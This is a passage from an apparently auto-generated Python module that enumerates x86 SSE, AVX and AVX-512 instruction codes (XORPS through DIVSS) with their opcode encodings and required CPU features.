``VEX.128.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VXORPS_YMM_YMM_YMMM256: int = 1326
"""
``VXORPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VXORPS_XMM_K1Z_XMM_XMMM128B32: int = 1327
"""
``VXORPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPS_YMM_K1Z_YMM_YMMM256B32: int = 1328
"""
``VXORPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1329
"""
``VXORPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 57 /r``
``AVX512DQ``
``16/32/64-bit``
"""
XORPD_XMM_XMMM128: int = 1330
"""
``XORPD xmm1, xmm2/m128``
``66 0F 57 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VXORPD_XMM_XMM_XMMM128: int = 1331
"""
``VXORPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VXORPD_YMM_YMM_YMMM256: int = 1332
"""
``VXORPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VXORPD_XMM_K1Z_XMM_XMMM128B64: int = 1333
"""
``VXORPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPD_YMM_K1Z_YMM_YMMM256B64: int = 1334
"""
``VXORPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1335
"""
``VXORPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 57 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ADDPS_XMM_XMMM128: int = 1336
"""
``ADDPS xmm1, xmm2/m128``
``NP 0F 58 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VADDPS_XMM_XMM_XMMM128: int = 1337
"""
``VADDPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDPS_YMM_YMM_YMMM256: int = 1338
"""
``VADDPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDPS_XMM_K1Z_XMM_XMMM128B32: int = 1339
"""
``VADDPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPS_YMM_K1Z_YMM_YMMM256B32: int = 1340
"""
``VADDPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1341
"""
``VADDPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDPD_XMM_XMMM128: int = 1342
"""
``ADDPD xmm1, xmm2/m128``
``66 0F 58 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VADDPD_XMM_XMM_XMMM128: int = 1343
"""
``VADDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDPD_YMM_YMM_YMMM256: int = 1344
"""
``VADDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDPD_XMM_K1Z_XMM_XMMM128B64: int = 1345
"""
``VADDPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPD_YMM_K1Z_YMM_YMMM256B64: int = 1346
"""
``VADDPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1347
"""
``VADDPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDSS_XMM_XMMM32: int = 1348
"""
``ADDSS xmm1, xmm2/m32``
``F3 0F 58 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VADDSS_XMM_XMM_XMMM32: int = 1349
"""
``VADDSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDSS_XMM_K1Z_XMM_XMMM32_ER: int = 1350
"""
``VADDSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDSD_XMM_XMMM64: int = 1351
"""
``ADDSD xmm1, xmm2/m64``
``F2 0F 58 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VADDSD_XMM_XMM_XMMM64: int = 1352
"""
``VADDSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDSD_XMM_K1Z_XMM_XMMM64_ER: int = 1353
"""
``VADDSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 58 /r``
``AVX512F``
``16/32/64-bit``
"""
MULPS_XMM_XMMM128: int = 1354
"""
``MULPS xmm1, xmm2/m128``
``NP 0F 59 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMULPS_XMM_XMM_XMMM128: int = 1355
"""
``VMULPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMULPS_YMM_YMM_YMMM256: int = 1356
"""
``VMULPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULPS_XMM_K1Z_XMM_XMMM128B32: int = 1357
"""
``VMULPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPS_YMM_K1Z_YMM_YMMM256B32: int = 1358
"""
``VMULPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1359
"""
``VMULPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULPD_XMM_XMMM128: int = 1360
"""
``MULPD xmm1, xmm2/m128``
``66 0F 59 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMULPD_XMM_XMM_XMMM128: int = 1361
"""
``VMULPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMULPD_YMM_YMM_YMMM256: int = 1362
"""
``VMULPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULPD_XMM_K1Z_XMM_XMMM128B64: int = 1363
"""
``VMULPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPD_YMM_K1Z_YMM_YMMM256B64: int = 1364
"""
``VMULPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1365
"""
``VMULPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULSS_XMM_XMMM32: int = 1366
"""
``MULSS xmm1, xmm2/m32``
``F3 0F 59 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMULSS_XMM_XMM_XMMM32: int = 1367
"""
``VMULSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULSS_XMM_K1Z_XMM_XMMM32_ER: int = 1368
"""
``VMULSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULSD_XMM_XMMM64: int = 1369
"""
``MULSD xmm1, xmm2/m64``
``F2 0F 59 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMULSD_XMM_XMM_XMMM64: int = 1370
"""
``VMULSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULSD_XMM_K1Z_XMM_XMMM64_ER: int = 1371
"""
``VMULSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPS2PD_XMM_XMMM64: int = 1372
"""
``CVTPS2PD xmm1, xmm2/m64``
``NP 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPS2PD_XMM_XMMM64: int = 1373
"""
``VCVTPS2PD xmm1, xmm2/m64``
``VEX.128.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPS2PD_YMM_XMMM128: int = 1374
"""
``VCVTPS2PD ymm1, xmm2/m128``
``VEX.256.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_XMM_K1Z_XMMM64B32: int = 1375
"""
``VCVTPS2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.0F.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_YMM_K1Z_XMMM128B32: int = 1376
"""
``VCVTPS2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.0F.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_ZMM_K1Z_YMMM256B32_SAE: int = 1377
"""
``VCVTPS2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.0F.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPD2PS_XMM_XMMM128: int = 1378
"""
``CVTPD2PS xmm1, xmm2/m128``
``66 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPD2PS_XMM_XMMM128: int = 1379
"""
``VCVTPD2PS xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPD2PS_XMM_YMMM256: int = 1380
"""
``VCVTPD2PS xmm1, ymm2/m256``
``VEX.256.66.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_XMM_K1Z_XMMM128B64: int = 1381
"""
``VCVTPD2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_XMM_K1Z_YMMM256B64: int = 1382
"""
``VCVTPD2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_YMM_K1Z_ZMMM512B64_ER: int = 1383
"""
``VCVTPD2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTSS2SD_XMM_XMMM32: int = 1384
"""
``CVTSS2SD xmm1, xmm2/m32``
``F3 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTSS2SD_XMM_XMM_XMMM32: int = 1385
"""
``VCVTSS2SD xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTSS2SD_XMM_K1Z_XMM_XMMM32_SAE: int = 1386
"""
``VCVTSS2SD xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTSD2SS_XMM_XMMM64: int = 1387
"""
``CVTSD2SS xmm1, xmm2/m64``
``F2 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTSD2SS_XMM_XMM_XMMM64: int = 1388
"""
``VCVTSD2SS xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTSD2SS_XMM_K1Z_XMM_XMMM64_ER: int = 1389
"""
``VCVTSD2SS xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTDQ2PS_XMM_XMMM128: int = 1390
"""
``CVTDQ2PS xmm1, xmm2/m128``
``NP 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTDQ2PS_XMM_XMMM128: int = 1391
"""
``VCVTDQ2PS xmm1, xmm2/m128``
``VEX.128.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTDQ2PS_YMM_YMMM256: int = 1392
"""
``VCVTDQ2PS ymm1, ymm2/m256``
``VEX.256.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_XMM_K1Z_XMMM128B32: int = 1393
"""
``VCVTDQ2PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_YMM_K1Z_YMMM256B32: int = 1394
"""
``VCVTDQ2PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1395
"""
``VCVTDQ2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_XMM_K1Z_XMMM128B64: int = 1396
"""
``VCVTQQ2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 5B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_XMM_K1Z_YMMM256B64: int = 1397
"""
``VCVTQQ2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 5B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1398
"""
``VCVTQQ2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.0F.W1 5B /r``
``AVX512DQ``
``16/32/64-bit``
"""
CVTPS2DQ_XMM_XMMM128: int = 1399
"""
``CVTPS2DQ xmm1, xmm2/m128``
``66 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPS2DQ_XMM_XMMM128: int = 1400
"""
``VCVTPS2DQ xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPS2DQ_YMM_YMMM256: int = 1401
"""
``VCVTPS2DQ ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_XMM_K1Z_XMMM128B32: int = 1402
"""
``VCVTPS2DQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_YMM_K1Z_YMMM256B32: int = 1403
"""
``VCVTPS2DQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_ZMM_K1Z_ZMMM512B32_ER: int = 1404
"""
``VCVTPS2DQ zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.66.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
CVTTPS2DQ_XMM_XMMM128: int = 1405
"""
``CVTTPS2DQ xmm1, xmm2/m128``
``F3 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTTPS2DQ_XMM_XMMM128: int = 1406
"""
``VCVTTPS2DQ xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTPS2DQ_YMM_YMMM256: int = 1407
"""
``VCVTTPS2DQ ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_XMM_K1Z_XMMM128B32: int = 1408
"""
``VCVTTPS2DQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F3.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_YMM_K1Z_YMMM256B32: int = 1409
"""
``VCVTTPS2DQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F3.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1410
"""
``VCVTTPS2DQ zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.F3.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
SUBPS_XMM_XMMM128: int = 1411
"""
``SUBPS xmm1, xmm2/m128``
``NP 0F 5C /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSUBPS_XMM_XMM_XMMM128: int = 1412
"""
``VSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSUBPS_YMM_YMM_YMMM256: int = 1413
"""
``VSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBPS_XMM_K1Z_XMM_XMMM128B32: int = 1414
"""
``VSUBPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPS_YMM_K1Z_YMM_YMMM256B32: int = 1415
"""
``VSUBPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1416
"""
``VSUBPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBPD_XMM_XMMM128: int = 1417
"""
``SUBPD xmm1, xmm2/m128``
``66 0F 5C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSUBPD_XMM_XMM_XMMM128: int = 1418
"""
``VSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSUBPD_YMM_YMM_YMMM256: int = 1419
"""
``VSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBPD_XMM_K1Z_XMM_XMMM128B64: int = 1420
"""
``VSUBPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPD_YMM_K1Z_YMM_YMMM256B64: int = 1421
"""
``VSUBPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1422
"""
``VSUBPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBSS_XMM_XMMM32: int = 1423
"""
``SUBSS xmm1, xmm2/m32``
``F3 0F 5C /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSUBSS_XMM_XMM_XMMM32: int = 1424
"""
``VSUBSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBSS_XMM_K1Z_XMM_XMMM32_ER: int = 1425
"""
``VSUBSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBSD_XMM_XMMM64: int = 1426
"""
``SUBSD xmm1, xmm2/m64``
``F2 0F 5C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSUBSD_XMM_XMM_XMMM64: int = 1427
"""
``VSUBSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBSD_XMM_K1Z_XMM_XMMM64_ER: int = 1428
"""
``VSUBSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5C /r``
``AVX512F``
``16/32/64-bit``
"""
MINPS_XMM_XMMM128: int = 1429
"""
``MINPS xmm1, xmm2/m128``
``NP 0F 5D /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMINPS_XMM_XMM_XMMM128: int = 1430
"""
``VMINPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMINPS_YMM_YMM_YMMM256: int = 1431
"""
``VMINPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINPS_XMM_K1Z_XMM_XMMM128B32: int = 1432
"""
``VMINPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPS_YMM_K1Z_YMM_YMMM256B32: int = 1433
"""
``VMINPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1434
"""
``VMINPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}``
``EVEX.512.0F.W0 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINPD_XMM_XMMM128: int = 1435
"""
``MINPD xmm1, xmm2/m128``
``66 0F 5D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMINPD_XMM_XMM_XMMM128: int = 1436
"""
``VMINPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMINPD_YMM_YMM_YMMM256: int = 1437
"""
``VMINPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINPD_XMM_K1Z_XMM_XMMM128B64: int = 1438
"""
``VMINPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPD_YMM_K1Z_YMM_YMMM256B64: int = 1439
"""
``VMINPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1440
"""
``VMINPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINSS_XMM_XMMM32: int = 1441
"""
``MINSS xmm1, xmm2/m32``
``F3 0F 5D /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMINSS_XMM_XMM_XMMM32: int = 1442
"""
``VMINSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1443
"""
``VMINSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINSD_XMM_XMMM64: int = 1444
"""
``MINSD xmm1, xmm2/m64``
``F2 0F 5D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMINSD_XMM_XMM_XMMM64: int = 1445
"""
``VMINSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1446
"""
``VMINSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.F2.0F.W1 5D /r``
``AVX512F``
``16/32/64-bit``
"""
DIVPS_XMM_XMMM128: int = 1447
"""
``DIVPS xmm1, xmm2/m128``
``NP 0F 5E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VDIVPS_XMM_XMM_XMMM128: int = 1448
"""
``VDIVPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VDIVPS_YMM_YMM_YMMM256: int = 1449
"""
``VDIVPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVPS_XMM_K1Z_XMM_XMMM128B32: int = 1450
"""
``VDIVPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPS_YMM_K1Z_YMM_YMMM256B32: int = 1451
"""
``VDIVPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1452
"""
``VDIVPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVPD_XMM_XMMM128: int = 1453
"""
``DIVPD xmm1, xmm2/m128``
``66 0F 5E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VDIVPD_XMM_XMM_XMMM128: int = 1454
"""
``VDIVPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VDIVPD_YMM_YMM_YMMM256: int = 1455
"""
``VDIVPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVPD_XMM_K1Z_XMM_XMMM128B64: int = 1456
"""
``VDIVPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPD_YMM_K1Z_YMM_YMMM256B64: int = 1457
"""
``VDIVPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1458
"""
``VDIVPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVSS_XMM_XMMM32: int = 1459
"""
``DIVSS xmm1, xmm2/m32``
``F3 0F 5E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VDIVSS_XMM_XMM_XMMM32: int = 1460
"""
``VDIVSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5E /r``
``AVX``
